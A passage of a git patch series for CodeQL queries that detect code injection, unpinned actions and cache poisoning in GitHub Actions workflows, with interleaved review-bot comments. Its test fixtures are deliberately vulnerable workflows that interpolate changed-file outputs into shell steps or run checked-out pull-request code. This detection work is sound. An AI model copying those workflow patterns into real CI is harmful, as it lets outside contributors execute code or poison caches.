@@ -302,7 +349,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + u.getMajorVersion() < 17 ) and this.asExpr() = u ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 85f59f6fa269..6d506e65a130 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -40,3 +40,21 @@ jobs: for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do echo "$file was changed" done + + - name: Get changed files 4 + id: changed-files4 + uses: tj-actions/changed-files@0874344d6ebbaa00a27da73276ae7162fadcaf69 # v44.3.0 + - name: List all changed files 4 + run: | + for file in ${{ steps.changed-files4.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 5 + id: changed-files5 + uses: tj-actions/changed-files@95690f9ece77c1740f4a55b7f1de9023ed6b1f87 # v39.2.3 + - name: List all changed files 5 + run: | + for file in ${{ steps.changed-files5.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e9738fa9458f..9e479f9eaf49 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
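Review bot: TJActionsVerifyChangedFilesSource only gets the `getMajorVersion() < 17` simplification, whereas the sibling changed-files source in this same commit also learns the commit SHAs of its pre-fix releases; a workflow pinning verify-changed-files to a full SHA of a pre-17 release yields no major version and is therefore still treated as safe. Either add the equivalent SHA table here or, if it is deliberately omitted, say so in a comment such as `// TODO: SHA-pinned pre-v17 releases are not recognised; only tag refs are checked`. The enclosing exists() and class continue outside the hunk.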
@@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | 
@@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -247,6 +250,7 @@ subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 048b0446f5f2..738270e3ccd8 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | 
@@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0ba7832e8e8f..dbbfba0a5574 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,17 +1,17 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| 
.github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 
'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | 
.github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not 
a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From d3bb6668f6fca4eb93a8f909bb1f49f5e7f5550d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:44:48 +0200 Subject: [PATCH 246/707] Missing getMajorVersion predicate
---
ql/lib/codeql/actions/Ast.qll | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index bfbc990d6712..6d80c67f7fd5 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -372,6 +372,8 @@ abstract class Uses extends AstNode instanceof UsesImpl {
 string getVersion() { result = super.getVersion() }
+ int getMajorVersion() { result = super.getMajorVersion() }
+
 string getArgument(string argName) { result = super.getArgument(argName) }
 Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) }
From c39e802c1729d0a9a41e00246686d9395d3bec07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 13:56:49 +0200 Subject: [PATCH 247/707] Fix sources for tj-actions/verify-changed-files
---
ql/lib/codeql/actions/dataflow/FlowSources.qll | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index bfe85dbdbe6a..9e4c258e39ab 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
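Review bot: The new `getMajorVersion()` wrapper on `Uses` has no QLDoc, and the property callers most need — what it yields when the ref is not a plain numeric tag (a pinned commit SHA, a branch name, or a ref such as `2.x`) — is stated nowhere in the hunk. The next patch in this series compares it with `< 17`, a test that silently never holds when the predicate has no result, so the contract should be written down; suggested: `/** Gets the major version of this action's ref; presumably has no result when the ref is not a version tag (e.g. a pinned SHA) — confirm against UsesImpl.getMajorVersion. */`. The enclosing `Uses` class begins before the hunk and continues past it.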
@@ -349,7 +349,20 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 + u.getMajorVersion() < 17 or + u.getVersion() + .matches([ + "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", + "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", + "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", + "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", + "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", + "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", + "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", + "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", + "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", + "48ddf88" + ] + "%") ) and this.asExpr() = u ) From b965a55339d8f4ba98ac701c394a5573a90e94cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:04:48 +0200 Subject: [PATCH 248/707] Fix error in select Casting to CachingWritingStep in the select clause was shadowing all the Poisonable result --- ql/src/Security/CWE-349/CachePoisoning.ql | 19 +++++++++++-------- .../CWE-349/.github/workflows/test8.yml | 19 +++++++++++++++++++ 2 files changed, 30 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index e0d59a02ab49..bf18df4797dc 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
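Review bot: The new SHA-prefix list in `TJActionsVerifyChangedFilesSource` carries duplicates — `54e20d3`, `0409e18`, `7517b83`, `f557547` and `a3391b5` each appear twice — and no comment says what the entries are or how they were produced, so a later reader cannot tell whether a missing release is an omission or deliberate. They appear to be the short SHAs behind the tags older than v17, added because `u.getMajorVersion() < 17` cannot hold for a SHA-pinned ref; if so, say it above the `.matches(` call: `// Short SHAs of the releases older than v17; SHA-pinned refs have no major version, so the < 17 test above never matches them`. Dropping the duplicates keeps the list auditable and changes nothing, since the alternation is a set. The class continues past the end of the hunk.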
@@ -22,13 +22,16 @@ where // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - j.getEnclosingWorkflow() - .hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", - "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", - "project_column", "public", "pull_request_comment", "pull_request_target", - "repository_dispatch", "schedule", "watch", "workflow_run" - ]) and + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( @@ -40,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml new file mode 100644 index 000000000000..68d3f7f75ac4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -0,0 +1,19 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + 
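Review bot: `defaultBranchTriggerEvent()` is called in the new trigger condition of `CachePoisoning.ql`, but nothing in this commit defines it — the predicate only appears in the following patch's `CachePoisoningQuery.qll` — so the query does not compile at this commit and a bisect across it lands on a broken tree. Either move the predicate into this commit next to the inlined event list it replaces, or squash the two patches. The `select checkout` change in the second hunk matches the commit message; note that the `where` clause begins before the first hunk.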
From fafb44d4f662f551e1c0d7cc3969cd4a08df43f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:20:48 +0200 Subject: [PATCH 249/707] Add CachePoisoning by Code Injection query
---
.../actions/security/CachePoisoningQuery.qll | 17 ++++++++ .../CWE-349/CachePoisoningByCodeInjection.ql | 41 +++++++++++++++++++ .../CWE-349/.github/workflows/test9.yml | 12 ++++++ .../Security/CWE-349/CachePoisoning.expected | 11 ++--- .../CachePoisoningByCodeInjection.expected | 6 +++ .../CachePoisoningByCodeInjection.qlref | 2 + 6 files changed, 84 insertions(+), 5 deletions(-) create mode 100644 ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref
diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
index 6668ef9777d6..9762e9d90784 100644
--- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
@@ -1,5 +1,15 @@
 import actions
+string defaultBranchTriggerEvent() {
+ result =
+ [
+ "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum",
+ "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column",
+ "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule",
+ "watch", "workflow_run"
+ ]
+}
+
 abstract class CacheWritingStep extends Step { }
 class CacheActionUsesStep extends CacheWritingStep, UsesStep {
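Review bot: `"pull_request_comment"` in `defaultBranchTriggerEvent()` is not a GitHub Actions event name, so that element can never match a workflow trigger; comments on a pull request arrive as `issue_comment`, which is already in the list, and diff review comments as `pull_request_review_comment`, which runs on the pull request's merge ref rather than the default branch, so the stray entry should be dropped rather than renamed. The predicate also has no QLDoc; suggested: `/** Gets the name of an event whose workflow runs execute in the context of the repository's default branch. */`. Because this list is the boundary for the cache-poisoning queries — an event missing from it is a missed finding, an extra one a false positive — a one-line comment naming the reference it was compiled from would make future edits safer.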
@@ -60,3 +70,10 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep {
 )
 }
 }
+
+class SetupRubyUsesStep extends CacheWritingStep, UsesStep {
+ SetupRubyUsesStep() {
+ this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and
+ this.getArgument("bundler-cache") = "true"
+ }
+}
diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql new file mode 100644
index 000000000000..2de07ec17bd1
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
@@ -0,0 +1,41 @@ +/** + * @name Cache Poisoning via low-privilege code injection + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/cache-poisoning/code-injection + * @tags actions + * security + * external/cwe/cwe-349 + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.security.CachePoisoningQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() and + // The workflow runs in the context of the default branch + // TODO: (require to collect trigger types) + // - add push to default branch? + // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git 